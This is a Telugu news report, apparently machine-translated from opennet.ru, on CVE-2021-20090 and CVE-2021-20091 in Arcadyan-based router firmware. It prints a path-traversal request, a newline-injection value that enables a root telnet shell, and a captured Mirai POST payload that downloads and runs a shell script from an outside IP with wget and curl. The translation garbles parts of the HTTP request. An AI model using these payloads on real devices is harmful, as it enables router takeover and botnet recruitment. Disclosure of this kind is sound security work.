17 తయారీదారులను ప్రభావితం చేసే హోమ్ రౌటర్‌లలో దుర్బలత్వం

Arcadyan కంపెనీ నుండి HTTP సర్వర్ అమలును ఉపయోగించే ఫర్మ్‌వేర్ హోమ్ రూటర్‌లకు వ్యతిరేకంగా నెట్‌వర్క్‌పై భారీ దాడి నమోదు చేయబడింది. పరికరాలపై నియంత్రణను పొందడానికి, రూట్ హక్కులతో ఏకపక్ష కోడ్‌ని రిమోట్‌గా అమలు చేయడానికి అనుమతించే రెండు దుర్బలత్వాల కలయిక ఉపయోగించబడుతుంది. సమస్య Arcadyan, ASUS మరియు బఫెలో నుండి చాలా విస్తృత శ్రేణి ADSL రౌటర్‌లను ప్రభావితం చేస్తుంది, అలాగే బీలైన్ బ్రాండ్‌ల క్రింద సరఫరా చేయబడిన పరికరాలను (సమస్య స్మార్ట్ బాక్స్ ఫ్లాష్‌లో నిర్ధారించబడింది), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone మరియు ఇతర టెలికాం ఆపరేటర్లు. ఆర్కాడియన్ ఫర్మ్‌వేర్‌లో 10 సంవత్సరాలకు పైగా సమస్య ఉందని మరియు ఈ సమయంలో 20 వేర్వేరు తయారీదారుల నుండి కనీసం 17 పరికర మోడళ్లకు మారగలిగిందని గుర్తించబడింది.

మొదటి దుర్బలత్వం, CVE-2021-20090, ప్రామాణీకరణ లేకుండా ఏదైనా వెబ్ ఇంటర్‌ఫేస్ స్క్రిప్ట్‌ను యాక్సెస్ చేయడాన్ని సాధ్యం చేస్తుంది. దుర్బలత్వం యొక్క సారాంశం ఏమిటంటే, వెబ్ ఇంటర్‌ఫేస్‌లో, ఇమేజ్‌లు, CSS ఫైల్‌లు మరియు జావాస్క్రిప్ట్ స్క్రిప్ట్‌లు పంపబడే కొన్ని డైరెక్టరీలు ప్రామాణీకరణ లేకుండా యాక్సెస్ చేయబడతాయి. ఈ సందర్భంలో, ప్రామాణీకరణ లేకుండా యాక్సెస్ అనుమతించబడే డైరెక్టరీలు ప్రారంభ ముసుగుని ఉపయోగించి తనిఖీ చేయబడతాయి. పేరెంట్ డైరెక్టరీకి వెళ్లడానికి పాత్‌లలో “../” అక్షరాలను పేర్కొనడం ఫర్మ్‌వేర్ ద్వారా బ్లాక్ చేయబడింది, కానీ “..%2f” కలయికను ఉపయోగించడం దాటవేయబడింది. అందువల్ల, “http://192.168.1.1/images/..%2findex.htm” వంటి అభ్యర్థనలను పంపేటప్పుడు రక్షిత పేజీలను తెరవడం సాధ్యమవుతుంది.

రెండవ దుర్బలత్వం, CVE-2021-20091, ప్రత్యేకంగా ఆకృతీకరించిన పారామితులను apply_abstract.cgi స్క్రిప్ట్‌కు పంపడం ద్వారా పరికరం యొక్క సిస్టమ్ సెట్టింగ్‌లలో మార్పులు చేయడానికి ప్రామాణీకరించబడిన వినియోగదారుని అనుమతిస్తుంది, ఇది పారామితులలో కొత్త లైన్ అక్షరం ఉనికిని తనిఖీ చేయదు. . ఉదాహరణకు, పింగ్ ఆపరేషన్ చేస్తున్నప్పుడు, దాడి చేసే వ్యక్తి ఫీల్డ్‌లో “192.168.1.2%0AARC_SYS_TelnetdEnable=1” విలువను IP చిరునామాతో తనిఖీ చేయవచ్చు మరియు సెట్టింగుల ఫైల్ /tmp/etc/config/ని సృష్టించేటప్పుడు స్క్రిప్ట్‌ను పేర్కొనవచ్చు. .glbcfg, దానిలో “AARC_SYS_TelnetdEnable=1” అనే పంక్తిని వ్రాస్తుంది ", ఇది telnetd సర్వర్‌ను సక్రియం చేస్తుంది, ఇది రూట్ హక్కులతో అనియంత్రిత కమాండ్ షెల్ యాక్సెస్‌ను అందిస్తుంది. అదేవిధంగా, AARC_SYS పరామితిని సెట్ చేయడం ద్వారా, మీరు సిస్టమ్‌లో ఏదైనా కోడ్‌ని అమలు చేయవచ్చు. మొదటి దుర్బలత్వం "/images/..%2fapply_abstract.cgi"గా యాక్సెస్ చేయడం ద్వారా ప్రామాణీకరణ లేకుండా సమస్యాత్మక స్క్రిప్ట్‌ను అమలు చేయడం సాధ్యం చేస్తుంది.

దుర్బలత్వాలను ఉపయోగించుకోవడానికి, దాడి చేసే వ్యక్తి తప్పనిసరిగా వెబ్ ఇంటర్‌ఫేస్ రన్ అవుతున్న నెట్‌వర్క్ పోర్ట్‌కి అభ్యర్థనను పంపగలగాలి. దాడి యొక్క వ్యాప్తి యొక్క డైనమిక్స్ ద్వారా నిర్ణయించడం, అనేక ఆపరేటర్లు మద్దతు సేవ ద్వారా సమస్యల నిర్ధారణను సులభతరం చేయడానికి బాహ్య నెట్‌వర్క్ నుండి వారి పరికరాల్లో యాక్సెస్‌ను వదిలివేస్తారు. ఇంటర్‌ఫేస్‌కు యాక్సెస్ అంతర్గత నెట్‌వర్క్‌కు మాత్రమే పరిమితం చేయబడితే, "DNS రీబైండింగ్" టెక్నిక్‌ని ఉపయోగించి బాహ్య నెట్‌వర్క్ నుండి దాడిని నిర్వహించవచ్చు. మిరాయ్ బోట్‌నెట్‌కు రౌటర్‌లను కనెక్ట్ చేయడానికి దుర్బలత్వాలు ఇప్పటికే సక్రియంగా ఉపయోగించబడుతున్నాయి: POST /images/..%2fapply_abstract.cgi HTTP/1.1 కనెక్షన్: వినియోగదారు-ఏజెంట్‌ను మూసివేయండి: డార్క్ యాక్షన్=స్టార్ట్_పింగ్&సమర్పించండి_button=ping.html& action_params=3blinktime5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; కర్ల్+-ఓ+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

మూలం: opennet.ru

ఒక వ్యాఖ్యను జోడించండి